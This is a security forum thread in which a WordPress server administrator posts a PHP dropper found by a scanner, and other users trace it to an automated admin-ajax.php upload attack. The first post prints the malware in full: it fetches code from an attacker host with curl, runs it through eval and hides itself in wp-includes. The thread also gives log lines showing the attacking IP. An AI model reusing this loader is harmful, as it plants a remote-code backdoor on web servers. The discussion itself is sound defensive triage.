FTL 2 Posted October 22, 2023 Posted October 22, 2023 (edited) Real time scanner on my Ubuntu 22.04 server thats used just to host wordpress sites found and deleted this bad boy Content of the file are as follows: <?php error_reporting(0); $HomePath = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/Text/Diff/"; define('CUSTOM_FILE_PATH', $HomePath); $file_path = __FILE__; $file_name = basename($file_path); $ch = curl_init('hxxp://ndot.us/za');curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval('?>'.$result); $customFilePath = CUSTOM_FILE_PATH . $file_name; rename(__FILE__,$customFilePath); ?> Ive checked all sites /wp-includes/Text/Diff directories and there are no new modified files/folders in any of them. What would be my next steps? Thanks in advance Edited October 22, 2023 by FTL
itman 1,801 Posted October 22, 2023 Posted October 22, 2023 (edited) Access ndot.us/za in a browser on Windows and see what happens. https://www.virustotal.com/gui/url/df38f83fac1af3dcc1a8c5380d99083d6ffa43ec6470c3bd433ed12541d1dc59/detection Interestingly, Eset didn't block the code from being displayed. Edited October 22, 2023 by itman
FTL 2 Posted October 22, 2023 Author Posted October 22, 2023 Chromium based browsers just show the code on the page in plain text Firefox shows the page formatted I cant see anything happening when i hit the page I have blocked outbound access to ndot.us now but just wondering if and what anything has already happened?
itman 1,801 Posted October 22, 2023 Posted October 22, 2023 (edited) 2 hours ago, FTL said: Firefox shows the page formatted My FF 118.0.2 showed code in plain text format. Note the modification author even stated who he is. Since this person has multiple scripts posted at Github, I assume this is where it originated from. Edited October 22, 2023 by itman
itman 1,801 Posted October 22, 2023 Posted October 22, 2023 Eset now finally blocking the domain; Also of interest is this domain won't scan at Sucuri. It displays the web site doesn't contain any data - go figure.
itman 1,801 Posted October 22, 2023 Posted October 22, 2023 Believe I found the original code at Github: https://gist.github.com/kosinix/52c13666c5632dae559910dbfe180df2
Gregecslo 8 Posted October 23, 2023 Posted October 23, 2023 Yes you did I also found it. URLSCAN.IO shows multiple scans for this domain with different Webshells hosted on it. @FTL We also got this detection, but it`s OK because at least for us, webserver returned 404 or 500 when POST request was made (we do not host wordpress at all). So basically this is automated script, that tries to exploit some wordpress vulnerability and if successful, curl downloads webshell. Example: 95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG And yes, detection occurred on: file:///tmp/phpMjc32fg which is normal, because PHP processed this POST request. So in my opinion nothing happened with your server, but check where that post request was made and make sure WP and plugins are up to date. itman 1
itman 1,801 Posted October 23, 2023 Posted October 23, 2023 8 hours ago, Gregecslo said: Yes you did I also found it. The Github link I posted was to the original WP plug-in. My above posted screen shots show that this plug-in was modified by someone named Mr. 7Mind. This same individual also has numerous other scripts posted at Github including reverse shell backdoors. So it appears this hack was very much "an off-the-shelf" one. The question is where was the modified WP plug-in acquired from?
Gregecslo 8 Posted October 23, 2023 Posted October 23, 2023 This I don`t know. For me, detection came from this: 95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG And it seems that exploited vuln is: https://support.alertlogic.com/hc/en-us/articles/115005740363-Metasploit-WordPress-Ajax-Load-More-Arbitrary-File-Upload Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500.... That`s why I said that OP should check POST requests on server...
FTL 2 Posted October 26, 2023 Author Posted October 26, 2023 So 4 times had this file created and RTS deleted now All on different sites - but they are all up to date for both Wordpress and all plugins Server is up to date too Same pesky IP aswell so thats blocked now but not the answer i know Site 1 95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" Site 2 95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" Site 3 95.214.27.5 - - [24/Oct/2023:22:26:34 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" Site 4 95.214.27.5 - - [26/Oct/2023:08:18:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" How is this PITA managing to continually drop malicious PHP files onto the tmp folder on server? In Depth scan of the server is clean
Administrators Marcos 5,450 Posted October 26, 2023 Administrators Posted October 26, 2023 Do you have Apache and PHP updated as well? You may want to take security measures for Apache and PHP, e.g. https://httpd.apache.org/docs/2.4/misc/security_tips.html and https://www.getastra.com/blog/php-security/php-security-guide/ for instance.
FTL 2 Posted October 26, 2023 Author Posted October 26, 2023 Hi Marcos I use Nginx rather than Apache, both are on the latest stable versions i believe nginx version: nginx/1.24.0 PHP 8.2.11 (cli) (built: Oct 6 2023 09:47:18) (NTS)
Administrators Marcos 5,450 Posted October 26, 2023 Administrators Posted October 26, 2023 I would then contact a security company that audits websites.
Gregecslo 8 Posted October 27, 2023 Posted October 27, 2023 (edited) Quote And yes, detection occurred on: file:///tmp/phpMjc32fg which is normal, because PHP processed this POST request. Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500.... If somebody does POST request with malicious file inside POST request PHP will process it (execution is done in PHP TMP folder) and that is where detection comes from. This also happens to me on server where nothing is installed but apache + php... Deleted ESET, SAME post request came, no files were dropped (but file was naturally in PHP). Problem would be if you find XXXX.php file which was dropped in webserver folder... Edited October 27, 2023 by Gregecslo FTL 1
Gregecslo 8 Posted October 27, 2023 Posted October 27, 2023 Something like this: https://octobercms.com/forum/post/being-attacked-please-help?page=1#post-37387 FTL 1
Recommended Posts